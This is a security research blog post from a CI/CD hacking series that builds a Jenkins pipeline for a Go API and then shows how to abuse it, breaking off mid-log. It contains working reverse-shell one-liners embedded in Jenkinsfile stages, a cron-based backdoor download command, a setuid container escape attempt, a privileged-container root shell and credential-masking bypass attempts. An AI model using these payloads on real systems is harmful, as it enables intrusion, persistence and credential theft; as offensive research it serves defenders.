This is the continuation of the Hacking CI/CD Pipelines series, where I look at five popular CI/CD tools to demonstrate how to abuse their functionality. If you have not read through part 1, it provides the context of the risks with CI/CD infrastructure, the two areas of focus for this series, and an example application we'll look to build in the pipeline. As a quick reminder, we'll be looking at how to execute malicious code in the pipeline, specifically a reverse shell, and how to grab sensitive credentials.
In this post, we'll be covering the granddaddy of CI/CD pipelines, Jenkins.
For the setup and configuration of Jenkins, I've decided to use a virtual machine as the underlying host and Docker containers for agents. This closely matches the setup I've seen whilst performing security reviews of Jenkins, albeit those typically use a completely separate instance for a build node with containerised workloads running as build agents. As I won't be looking at compromising sensitive files from the main Jenkins host, I thought this setup was good enough.
I've chosen Ubuntu 24.04 LTS as the underlying host and followed these installation guidelines with the LTS release. Once Jenkins is installed along with its dependencies and the controller is unlocked, the administrator is asked about plugins. I chose to “Install suggested plugins”, but there will likely be other plugins I'll need once I start defining the pipeline.
For clarity, the Jenkins version is 2.492.2 and I'm using openjdk 17.0.14 2025-01-21 for Java.
With that done, it’s time to consider what we need for the pipeline to build our example go api app.
For the pipeline I would like to perform the following steps:

- Check out the source code from GitHub
- Build the Go binary
- Run the unit tests
- Build the container image
- Push the container image to DockerHub
For the Go build, Jenkins has a Go plugin where you define the Go version for the build agent to pull and then, within a build stage, execute the necessary Go commands. The command for executing the build is already defined in our Dockerfile within the Go API application GitHub repository, which is:

go build -o demo-api -ldflags='-w -s' .

(The -w and -s linker flags strip the DWARF debug information and symbol table respectively, shrinking the binary.)
This will also allow us to perform the go unit tests as part of another pipeline stage.
go test ./...
Next we’ll need to integrate with Docker to perform the build and push to the registry. For this I’ve used the Docker Pipeline Plugin. It supports a number of global variables for running common methods for building and publishing containers.
For example, to build a Docker image it is as simple as:
docker.build "mycorp/myapp:${env.BUILD_TAG}"
As stated previously, I wanted to run the build agent as a Docker container. For this I would need to install Docker on the main host and the Docker Plugin. Docker was installed via the official guidelines using apt.
For the configuration of the agent, I followed the official guide for using agents. This essentially involves generating an SSH key pair, storing the private key as a Jenkins credential, launching the jenkins/ssh-agent container with the public key, and adding a new node in Jenkins that connects to the container over SSH.
Note: I originally configured the admin user with a name other than jenkins. When attempting to connect to the Jenkins Docker image (jenkins/ssh-agent:alpine-jdk17) with a username other than jenkins, it failed to connect. Additionally, if there is no /home/jenkins directory the container agent will fail to connect. Obviously this can be rectified by creating a custom Jenkins agent container image.
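As a sketch of the agent setup described above, the SSH key pair can be generated as follows; the key path and comment are illustrative, and the public half is what gets passed to the container via JENKINS_AGENT_SSH_PUBKEY:

```shell
# Generate a dedicated keypair for the build agent (illustrative path).
# The private key is stored as a Jenkins SSH credential; the public key
# is injected into the jenkins/ssh-agent container at launch.
ssh-keygen -t ed25519 -f ./jenkins_agent_key -N '' -C 'jenkins@jenkins'
cat ./jenkins_agent_key.pub
```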
The last remaining configuration item is the access token to push to DockerHub. This is easily generated under the user account in DockerHub and placed as a username/password credential in Jenkins.
Before we start defining the pipeline definition file (Jenkinsfile), there are a couple of options for building and testing the Go application. The entire build and test of the application could have been performed inside a container, but this would mean that the Dockerfile would not be slim, that is, the Go tools would need to be included in the published container image. I'm a strong believer in multi-stage builds and reducing the number of tools in the image as much as possible, so this breaks that methodology. I could have created a separate Dockerfile which was just used for testing, but again this is another configuration item to manage (though I guess in my case it's just dependabot maintaining the majority of it). Ultimately, I made the decision to keep it simple and leverage the Go plugin.
Regarding the Docker agent, the image provided in the Jenkins guidelines does not include docker, so it would require building a custom one. If I were to do this, I would likely need to run “docker in docker” on the agent or mount the docker socket. To reduce the complexity, many administrators will run the agent as privileged, which is hugely dangerous. Again, to reduce the complexity and keep the pipeline simple, the agent was set to any instead of label "agent". As there are no other builds occurring on the Jenkins server, it will run the pipeline on the controller rather than choosing an agent.
Note: I will return to the Jenkins build agent container to review the attack surface to see what is possible.
Below is the final pipeline definition file.
pipeline {
    agent any
    tools { go '1.24.1' }
    environment {
        REPO = 'https://github.com/wakeward/demo-api-app.git'
        IMAGE_TAG = 'wakeward/demo-api-app'
        DOCKERHUB = 'wakeward-dockerhub'
    }
    stages {
        stage('checkout source code') {
            steps {
                git (url: "${REPO}", branch: 'main')
            }
        }
        stage('building go binary') {
            steps {
                echo 'Building go binary...'
                sh "go build -o demo-api -ldflags='-w -s' ."
            }
        }
        stage('run unit tests') {
            steps {
                script {
                    echo 'Running unit tests...'
                    sh "go test ./..."
                }
            }
        }
        stage('build container image') {
            steps {
                script {
                    echo 'Building container image...'
                    docker_image = docker.build("${IMAGE_TAG}:${env.BUILD_TAG}")
                }
            }
        }
        stage('push container image') {
            steps {
                script {
                    echo 'Pushing container image to Dockerhub...'
                    withDockerRegistry(url: '', credentialsId: "${DOCKERHUB}") {
                        docker_image.push()
                    }
                }
            }
        }
    }
    post {
        success {
            echo 'Deployment completed successfully.'
        }
        failure {
            echo 'Deployment failed. Please check the logs.'
        }
    }
}
The pipeline executed successfully and I've taken a few interesting snippets from the build log. The first is cloning the GitHub repository, where we can see that no credentials were specified as it is public. If it were private, it would present us with another token to exfiltrate.
[Pipeline] git
The recommended git tool is: NONE
No credentials specified
Cloning the remote Git repository
Cloning repository https://github.com/wakeward/demo-api-app.git
> git init /var/lib/jenkins/workspace/demo-go-api-pipeline # timeout=10
Fetching upstream changes from https://github.com/wakeward/demo-api-app.git
> git --version # timeout=10
> git --version # 'git version 2.43.0'
> git fetch --tags --force --progress -- https://github.com/wakeward/demo-api-app.git +refs/heads/*:refs/remotes/origin/* # timeout=10
> git config remote.origin.url https://github.com/wakeward/demo-api-app.git # timeout=10
> git config --add remote.origin.fetch +refs/heads/*:refs/remotes/origin/* # timeout=10
Avoid second fetch
> git rev-parse refs/remotes/origin/main^{commit} # timeout=10
Checking out Revision 3d1abdd361e6a6b66e64e97faea4155e3bc33e5a (refs/remotes/origin/main)
> git config core.sparsecheckout # timeout=10
> git checkout -f 3d1abdd361e6a6b66e64e97faea4155e3bc33e5a # timeout=10
> git branch -a -v --no-abbrev # timeout=10
> git checkout -b main 3d1abdd361e6a6b66e64e97faea4155e3bc33e5a # timeout=10
Commit message: "fix: update demo api application with dockerfile and version bump"
The next part of the log to show is the stage pushing to DockerHub.
Pushing container image to Dockerhub...
[Pipeline] withDockerRegistry
$ docker login -u wakeward -p ******** https://index.docker.io/v1/
WARNING! Using --password via the CLI is insecure. Use --password-stdin.
WARNING! Your credentials are stored unencrypted in '/var/lib/jenkins/workspace/demo-go-api-pipeline@tmp/1ca36096-b1e5-40b0-bbee-03a8be752152/config.json'.
Configure a credential helper to remove this warning. See
https://docs.docker.com/go/credential-store/
Login Succeeded
The configuration for pushing to DockerHub was based on guidelines from the Docker Pipeline Plugin. The first warning is normal if you are not using stdin for the password. Fortunately, it is automatically masked by Jenkins to ensure it is not leaked into the log. The second warning is more worrying: the credentials are placed into a local directory (Docker's config.json stores the registry auth as the base64 encoding of username:token, so anyone who can read the file recovers the credential). However, since the execution of the pipeline I've restarted the Jenkins instance and the file no longer exists.
wakeward@jenkins:/var/lib/jenkins/workspace/demo-go-api-pipeline@tmp$ ls -la
total 8
drwxr-xr-x 2 jenkins jenkins 4096 Mar 16 00:12 .
drwxr-xr-x 8 jenkins jenkins 4096 Mar 19 21:40 ..
This demonstrates the importance of not persisting build agents. Credentials can be leaked or temporarily stored on the agent, and an adversary who compromises it could harvest anything left behind from previous builds. Additionally, an adversary could install persistence on the agent (looking to pivot to other accessible services), and not destroying the build agent allows them to stay within the internal network.
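Hunting for those leftovers on a build host is straightforward. As a sketch (the scan_for_creds helper is mine, and the default path assumes a standard apt install of Jenkins):

```shell
# Search a Jenkins workspace root for Docker credential files left behind
# by withDockerRegistry; they live under <job>@tmp/<uuid>/config.json.
scan_for_creds() {
    find "${1:-/var/lib/jenkins/workspace}" -path '*@tmp*' -name 'config.json' 2>/dev/null
}

scan_for_creds "${JENKINS_WS:-/var/lib/jenkins/workspace}" || true
```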
With the container image built, we can check it by pulling it from DockerHub and testing it out.
docker pull wakeward/demo-api-app:jenkins-demo-go-api-pipeline-1
jenkins-demo-go-api-pipeline-1: Pulling from wakeward/demo-api-app
2445dbf7678f: Already exists
f291067d32d8: Already exists
d50622aa9b3f: Pull complete
Digest: sha256:a4c2dec8574773d3dcdc5fc4089690d47d514f98ad9cf12e5b6c92382a6ffc97
Status: Downloaded newer image for wakeward/demo-api-app:jenkins-demo-go-api-pipeline-1
docker.io/wakeward/demo-api-app:jenkins-demo-go-api-pipeline-1
docker run -it --rm -p 8080:8080 wakeward/demo-api-app:jenkins-demo-go-api-pipeline-1
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] GET /api/v1/healthcheck --> github.com/wakeward/demo-api-app/controllers.HealthCheck (3 handlers)
[GIN-debug] GET /swagger/*any --> github.com/swaggo/gin-swagger.CustomWrapHandler.func1 (3 handlers)
[GIN-debug] [WARNING] You trusted all proxies, this is NOT safe. We recommend you to set a value.
Please check https://pkg.go.dev/github.com/gin-gonic/gin#readme-don-t-trust-all-proxies for details.
[GIN-debug] Listening and serving HTTP on :8080
curl http://localhost:8080/api/v1/healthcheck
service is running
With a working pipeline, let’s get to hacking!
Executing malicious code is pretty trivial as the pipeline allows us to execute shell commands. A bash reverse shell is simply:
bash -i >& /dev/tcp/<IP-ADDR>/<PORT> 0>&1
My preference is always to encode this one-liner, just in case there is an issue with processing the characters. This is achieved by base64-encoding the one-liner, echoing it out and piping it to bash.
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK" | base64 -d | bash
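For reference, the encoded string can be reproduced and verified locally (GNU coreutils base64 assumed):

```shell
# Encode the reverse-shell one-liner; decoding it back confirms the payload
payload='bash -i >& /dev/tcp/<IP-ADDR>/<PORT> 0>&1'
encoded=$(printf '%s\n' "$payload" | base64 | tr -d '\n')
echo "$encoded"                   # prints YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK
printf '%s' "$encoded" | base64 -d   # prints the original one-liner
```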
This is simply put into a pipeline stage like this:
...
stages {
    stage('reverse shell') {
        steps {
            sh 'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK" | base64 -d | bash'
        }
    }
}
...
Rather than start by attacking the host, we’ll focus on the build agent container. To force the pipeline to use the agent, it is as simple as specifying:
pipeline {
agent { label "agent1" }
...
Running this we receive our reverse shell, but the pipeline is stuck running due to the open connection.
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (reverse shell)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] sh
+ echo YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK
+ base64 -d
+ bash
Reverse Connection:
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 59437
bash: cannot set terminal process group (1423): Inappropriate ioctl for device
bash: no job control in this shell
7e1ba0bc527e:~/workspace/cred-dump-test$ id
id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins),1000(jenkins)
Having the pipeline stuck with the connection is far from ideal. Also inspecting the pipeline definition file, it is clear what is happening. So what else can we do?
A better method is to install a backdoor on the underlying host. A cron job is often used by adversaries to establish persistence and obtain C2 connectivity from the compromised host.
Here is a one liner used by an adversary to install a C2 implant.
chattr -ia /etc/cron.d; (echo '* * * * * root (curl -k http://<ENDPOINT>:<PORT>/backdoor | bash); rm /etc/cron.d/1weekly' > /etc/cron.d/1weekly)
This uses chattr to change the attributes of a Linux file; in this instance it ensures that files under the /etc/cron.d directory can be modified (i.e. it removes the immutable and append-only attributes). Next it writes a cron entry that executes every minute, downloading a backdoor and executing it with bash. Once this has completed, the entry removes itself from the /etc/cron.d directory. The backdoor would likely be a C2 implant that would maintain persistence on the host.
Whilst this is useful, there are two issues here:

- it requires root level permissions to modify the /etc/cron.d files
- our shell on the build agent is running as the unprivileged jenkins user

Let's see if we can work around these limitations and attempt to obtain root permissions.
The docker build agent is run with the following command:
docker run -d --rm --name=agent1 -p 22:22 -e "JENKINS_AGENT_SSH_PUBKEY=<PUBLIC-KEY> jenkins@jenkins" jenkins/ssh-agent:alpine-jdk17
Normally docker is run as a privileged operation, and the easiest solution is adding a user to the docker group. This is what I've done in my Jenkins setup, and it is confirmed by looking at the processes running:
ps -ef | grep docker
root 1557 1 0 10:02 ? 00:00:04 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 3874 1557 0 10:03 ? 00:00:01 /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 22 -container-ip 172.17.0.2 -container-port 22 -use-listen-fd
root 3879 1557 0 10:03 ? 00:00:00 /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 22 -container-ip 172.17.0.2 -container-port 22 -use-listen-fd
If we are able to break out of the container, there is a good chance we'll be able to leverage the root user account. But what permissions have we been given in the build agent?
We can find this out by looking under /proc/ for the running container:
7e1ba0bc527e:~/caches/durable-task$ cat /proc/1/status | grep Cap
cat /proc/1/status | grep Cap
CapInh: 0000000000000000
CapPrm: 00000000a80425fb
CapEff: 00000000a80425fb
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
A quick look at what that translates to gives us this:
capsh --decode=00000000a80425fb
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
The Linux capabilities listed do not provide a means to escape the build agent container. If you want to know more about the capabilities that may allow an escape, this is an excellent post.
If linux capabilities cannot be used, let’s see if we have access to any sensitive mount points.
7e1ba0bc527e:/home/jenkins# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/CLOKSL2URXBOYPCY6CFPROIHLH:/var/lib/docker/overlay2/l/BPH5AR45CKTUWYECL4UHJ2QFHJ:/var/lib/docker/overlay2/l/TMZJDPGHB6OVFYFZSQ6MPGKKVW:/var/lib/docker/overlay2/l/6DQLKCANHC36QDBJFYDDR2VPXI:/var/lib/docker/overlay2/l/5AOHH76A5SVL3FGN3CL2MZB4G5:/var/lib/docker/overlay2/l/XJDBNISOTFMX7EERPINB64N7II:/var/lib/docker/overlay2/l/EBVOV5Q7MKG3OVQE5CGAKRLERJ:/var/lib/docker/overlay2/l/OKBYO4M5UWY5XASXBDLEF2JZAO:/var/lib/docker/overlay2/l/P2MAW34RACN5MYWTEIUAQHXNJX,upperdir=/var/lib/docker/overlay2/e4fe50a82c1862ca202b2777d6789349047ba946ddf3617aac441195e6d74da2/diff,workdir=/var/lib/docker/overlay2/e4fe50a82c1862ca202b2777d6789349047ba946ddf3617aac441195e6d74da2/work,nouserxattr)
...
/dev/sda2 on /home/jenkins/.jenkins type ext4 (rw,relatime)
/dev/sda2 on /home/jenkins/agent type ext4 (rw,relatime)
...
From the mount points we can see the Docker overlay, which is useful if you ever want to know whether you are in a container, but there are two more which are non-standard: mounted directories from the Jenkins host. If we search for files which have suid or sgid configured, we find the following:
7e1ba0bc527e:/home/jenkins# find / -perm /4000
7e1ba0bc527e:/home/jenkins# find / -perm /2000
/home/jenkins
/home/jenkins/.jenkins
/home/jenkins/agent
/home/jenkins/.ssh
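As an aside, find's -perm /4000 matches the setuid bit and /2000 the setgid bit. A quick local demonstration (temporary file, GNU coreutils assumed):

```shell
# Mode 4755 = setuid + rwxr-xr-x; find's -perm /4000 picks it up
f=$(mktemp)
chmod 4755 "$f"
stat -c '%A' "$f"    # -rwsr-xr-x: the 's' in the owner slot is the setuid bit
find "$(dirname "$f")" -maxdepth 1 -name "$(basename "$f")" -perm /4000
rm -f "$f"
```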
This is interesting: if we can create an executable file in one of these directories, add the suid permission bit and then execute it from outside the container, we could run the executable file with root privileges. Let's create a script in the agent directory:
7e1ba0bc527e:~/agent$ touch rs.sh
7e1ba0bc527e:~/agent$ echo "bash -i >& /dev/tcp/<ADVERSARY-PUBLIC-IP>/4444 0>&1" > rs.sh
7e1ba0bc527e:~/agent$ chmod u+sx rs.sh
7e1ba0bc527e:~/agent$ ls -la
total 16
drwxr-sr-x 2 jenkins jenkins 4096 Mar 26 20:36 .
drwxr-sr-x 1 jenkins jenkins 4096 Mar 26 11:56 ..
-rwsr--r-- 1 jenkins jenkins 45 Mar 26 20:36 rs.sh
As we have access to the underlying host, we can check where that script has been created.
root@jenkins:~# find / -name rs.sh 2>/dev/null
/var/lib/docker/volumes/a041105f741f22cb1a0ed9ea9fe8b24bf0f20bb9e9ef4d480bda97bd096f6798/_data/rs.sh
If we manually execute this, we receive a reverse shell connection as root.
Jenkins Host:
/var/lib/docker/volumes/a041105f741f22cb1a0ed9ea9fe8b24bf0f20bb9e9ef4d480bda97bd096f6798/_data/rs.sh
Adversary Host:
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 64174
root@jenkins:/home/wakeward# id
id
uid=0(root) gid=0(root) groups=0(root)
This is progress. The next question is: how do we get root to trigger this file?
I reported this security finding to the Jenkins Team and was told: “You should only run a Docker agent inside a VM with no valuable information. Perhaps the docs could be clarified, that is all.”
At this point you may have noticed the .ssh directory has the sgid bit set, but remember it is not mapped to a mount point on the underlying host.
Looking for Jenkins processes on the host returns a few relevant results:
ps -ef | grep [j]enkins
avahi 1027 1 0 20:05 ? 00:00:00 avahi-daemon: running [jenkins.local]
jenkins 1437 1 10 20:06 ? 00:00:59 /usr/bin/java -Djava.awt.headless=true -jar /usr/share/java/jenkins.war --webroot=/var/cache/jenkins/war --httpPort=8080
root 5652 5570 0 20:13 ? 00:00:00 sshd-session: jenkins [priv]
wakeward 5655 5652 0 20:13 ? 00:00:00 sshd-session: jenkins@notty
wakeward 5663 5655 4 20:13 ? 00:00:05 java -jar remoting.jar -workDir /home/jenkins -jar-cache /home/jenkins/remoting/jarCache
The primary process is executed as jenkins, and in the current configuration that user does not have sudo permissions:
sudo -l -U jenkins
User jenkins is not allowed to run sudo on jenkins.
Once again we can see the docker container process running as root.
root 1592 1 0 20:06 ? 00:00:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 5605 1592 0 20:13 ? 00:00:00 \_ /usr/bin/docker-proxy -proto tcp -host-ip 0.0.0.0 -host-port 22 -container-ip 172.17.0.2 -container-port 22 -use-listen-fd
root 5611 1592 0 20:13 ? 00:00:00 \_ /usr/bin/docker-proxy -proto tcp -host-ip :: -host-port 22 -container-ip 172.17.0.2 -container-port 22 -use-listen-fd
...
root 5548 1 0 20:13 ? 00:00:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id f454e57be9d28bae3d2d24badfd0309595c76661788d02f9c49a14c5ce101084 -address /run
root 5570 5548 0 20:13 ? 00:00:00 \_ sshd: /usr/sbin/sshd -D -e [listener] 0 of 10-100 startups
root 5652 5570 0 20:13 ? 00:00:00 \_ sshd-session: jenkins [priv]
wakeward 5655 5652 2 20:13 ? 00:00:00 \_ sshd-session: jenkins@notty
wakeward 5663 5655 19 20:13 ? 00:00:04 \_ java -jar remoting.jar -workDir /home/jenkins -jar-cache /home/jenkins/remoting/jarCache
The only way we could leverage this is using the privileged (or equivalent) flag, which breaks the Linux namespacing. Remember that all we have access to in this scenario is the pipeline definition file, so we won't be able to affect the running Docker agent, but we could specify a privileged container in the pipeline. At this point, the previous steps are a little superfluous as we could just execute the whole process as a privileged container.
stages {
    stage('privileged reverse shell') {
        steps {
            script {
                echo 'Building container image...'
                docker.image('ubuntu:latest').withRun('--user=root:root --privileged --net=host --pid=host --ipc=host') { c ->
                    sh 'echo "YmFzaCAtaSA+JiAvZGV2L3RjcC88SVAtQUREUj4vPFBPUlQ+IDA+JjEK" | base64 -d | bash'
                }
            }
        }
    }
}
Using our one-liner returns a privileged process, but only with the jenkins user.
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 56991
jenkins@jenkins:~/workspace/cred-dump-test$ capsh --print | grep cap
capsh --print | grep cap
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read,cap_perfmon,cap_bpf,cap_checkpoint_restore
This is because we are piping our reverse shell into a bash session which is not root. To receive a root reverse shell, we'll need to create a container which launches it via a script, as passing it directly will return the input device is not a TTY from the Jenkins pipeline. Our pipeline stage becomes:
stage('privileged reverse shell') {
    steps {
        script {
            echo 'Building container image...'
            sh 'docker run --user=root:root --privileged --net=host --pid=host --ipc=host -e IP=<ADVERSARY-PUBLIC-IP> -e PORT=4444 wakeward/bash-rs:latest'
        }
    }
}
And we receive a root reverse shell.
wakeward@ubu-skyhook-2024:~$ nc -lnvp 4444
Listening on 0.0.0.0 4444
Connection received on <JENKINS-PUBLIC-IP> 65096
root@jenkins:/# id
id
uid=0(root) gid=0(root) groups=0(root)
At this point we are root and we can install our C2 server on the Jenkins server.
Note: I was disappointed not to be able to leverage the mount point and suid method, but it's worth noting the Docker volume directory is not accessible by unprivileged system users. This means the file is restricted to privileged users only, which makes dropping a script on a Jenkins host this way fairly stealthy.
Before we move on, let’s perform a vulnerability scan to see if there is anything we could leverage within our pipeline.
trivy image jenkins/ssh-agent:alpine-jdk17
2025-03-31T01:12:48+01:00 INFO [vulndb] Need to update DB
2025-03-31T01:12:48+01:00 INFO [vulndb] Downloading vulnerability DB...
2025-03-31T01:12:48+01:00 INFO [vulndb] Downloading artifact... repo="mirror.gcr.io/aquasec/trivy-db:2"
61.66 MiB / 61.66 MiB [--------------------------------------------------------------------------------------------------------------------------------------] 100.00% 4.55 MiB p/s 14s
2025-03-31T01:13:03+01:00 INFO [vulndb] Artifact successfully downloaded repo="mirror.gcr.io/aquasec/trivy-db:2"
2025-03-31T01:13:03+01:00 INFO [vuln] Vulnerability scanning is enabled
2025-03-31T01:13:03+01:00 INFO [secret] Secret scanning is enabled
2025-03-31T01:13:03+01:00 INFO [secret] If your scanning is slow, please try '--scanners vuln' to disable secret scanning
2025-03-31T01:13:03+01:00 INFO [secret] Please see also https://trivy.dev/v0.61/docs/scanner/secret#recommendation for faster secret detection
2025-03-31T01:13:05+01:00 INFO [javadb] Downloading Java DB...
2025-03-31T01:13:05+01:00 INFO [javadb] Downloading artifact... repo="mirror.gcr.io/aquasec/trivy-java-db:1"
705.31 MiB / 705.31 MiB [----------------------------------------------------------------------------------------------------------------------------------] 100.00% 5.28 MiB p/s 2m14s
2025-03-31T01:15:19+01:00 INFO [javadb] Artifact successfully downloaded repo="mirror.gcr.io/aquasec/trivy-java-db:1"
2025-03-31T01:15:19+01:00 INFO [javadb] Java DB is cached for 3 days. If you want to update the database more frequently, "trivy clean --java-db" command clears the DB cache.
2025-03-31T01:15:19+01:00 INFO Detected OS family="alpine" version="3.21.3"
2025-03-31T01:15:19+01:00 INFO [alpine] Detecting vulnerabilities... os_version="3.21" repository="3.21" pkg_num=47
2025-03-31T01:15:19+01:00 INFO Number of language-specific files num=0
2025-03-31T01:15:19+01:00 WARN Using severities from other vendors for some vulnerabilities. Read https://trivy.dev/v0.61/docs/scanner/vulnerability#severity-selection for details.
Report Summary
┌────────────────────────────────────────────────┬────────┬─────────────────┬─────────┐
│ Target                                         │ Type   │ Vulnerabilities │ Secrets │
├────────────────────────────────────────────────┼────────┼─────────────────┼─────────┤
│ jenkins/ssh-agent:alpine-jdk17 (alpine 3.21.3) │ alpine │ 1               │ -       │
└────────────────────────────────────────────────┴────────┴─────────────────┴─────────┘
Legend:
- '-': Not scanned
- '0': Clean (no security findings detected)
jenkins/ssh-agent:alpine-jdk17 (alpine 3.21.3)
Total: 1 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 1, CRITICAL: 0)
┌──────────┬───────────────┬──────────┬────────┬───────────────────┬───────────────┬─────────────────────────────────────────────────────┐
│ Library  │ Vulnerability │ Severity │ Status │ Installed Version │ Fixed Version │ Title                                               │
├──────────┼───────────────┼──────────┼────────┼───────────────────┼───────────────┼─────────────────────────────────────────────────────┤
│ libexpat │ CVE-2024-8176 │ HIGH     │ fixed  │ 2.6.4-r0          │ 2.7.0-r0      │ libexpat: expat: Improper Restriction of XML Entity │
│          │               │          │        │                   │               │ Expansion Depth in libexpat                         │
│          │               │          │        │                   │               │ https://avd.aquasec.com/nvd/cve-2024-8176           │
└──────────┴───────────────┴──────────┴────────┴───────────────────┴───────────────┴─────────────────────────────────────────────────────┘
Only a single vulnerability is returned, which relates to recursively expanding XML entities and doesn't seem realistic to exploit in the pipeline.
Ah well… time to steal some credentials!
As previously demonstrated with the functional pipeline, Jenkins automatically masks credentials in the build log. As a quick reminder:
Pushing container image to Dockerhub...
[Pipeline] withDockerRegistry
$ docker login -u wakeward -p ******** https://index.docker.io/v1/
If we were to attempt to simply echo out the credentials in the pipeline definition file, it returns the following:
pipeline {
    agent any
    tools { go '1.24.1' }
    environment {
        DOCKERHUB = 'wakeward-dockerhub'
    }
    stages {
        stage('outputting creds') {
            steps {
                withCredentials([usernamePassword(credentialsId: "${DOCKERHUB}", usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD')]) {
                    echo "DockerHub Creds: ${PASSWORD}"
                }
            }
        }
    }
}
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (outputting creds)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] withCredentials
Masking supported pattern matches of $PASSWORD
[Pipeline] {
[Pipeline] echo
Warning: A secret was passed to "echo" using Groovy String interpolation, which is insecure.
Affected argument(s) used the following variable(s): [PASSWORD]
See https://jenkins.io/redirect/groovy-string-interpolation for details.
DockerHub Creds: ****
Again, Jenkins automatically detects the credential based on the fact the pipeline is using a withCredentials parameter and the passwordVariable. We can attempt to circumvent this by trying another method, such as writing the credentials to a file and cat-ing it out.
pipeline {
    agent any
    tools { go '1.24.1' }
    environment {
        DOCKERHUB = 'wakeward-dockerhub'
    }
    stages {
        stage('outputting creds') {
            steps {
                withCredentials([usernamePassword(credentialsId: "${DOCKERHUB}", usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD')]) {
                    writeFile([file: "creds.txt", text: "${PASSWORD}"])
                    sh 'cat creds.txt'
                }
            }
        }
    }
}
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (outputting creds)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] withEnv
[Pipeline] {
[Pipeline] withCredentials
Masking supported pattern matches of $PASSWORD
[Pipeline] {
[Pipeline] writeFile
Warning: A secret was passed to "writeFile" using Groovy String interpolation, which is insecure.
Affected argument(s) used the following variable(s): [PASSWORD]
See https://jenkins.io/redirect/groovy-string-interpolation for details.
[Pipeline] sh
+ cat creds.txt
****
Once again, Jenkins detects this and prevents the credentials from being leaked. At this point I began to play with the pipeline definition, manipulating the credentials via encoding to validate the robustness of the masking functionality. In doing so, I incorrectly defined some pipeline arguments, which returned the following exception:
pipeline {
    agent any
    tools { go '1.24.1' }
    environment {
        DOCKERHUB = 'wakeward-dockerhub'
    }
    stages {
        stage('outputting creds') {
            steps {
                withCredentials([usernamePassword(credentialsId: "${DOCKERHUB}", usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD')]) {
                    writeFile([file: "creds.txt", text: "${PASSWORD}", encoding: 'Base64']) {
                        sh 'cat creds.txt'
                    }
                }
            }
        }
    }
}
Started by user jenkins
[Pipeline] Start of Pipeline
[Pipeline] node
Running on Jenkins in /var/lib/jenkins/workspace/cred-dump-test
[Pipeline] {
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
[Pipeline] { (Declarative: Tool Install)
[Pipeline] tool
[Pipeline] envVarsForTool
[Pipeline] }
[Pipeline] // stage
[Pipeline] withEnv
[Pipeline] {
[Pipeline] stage
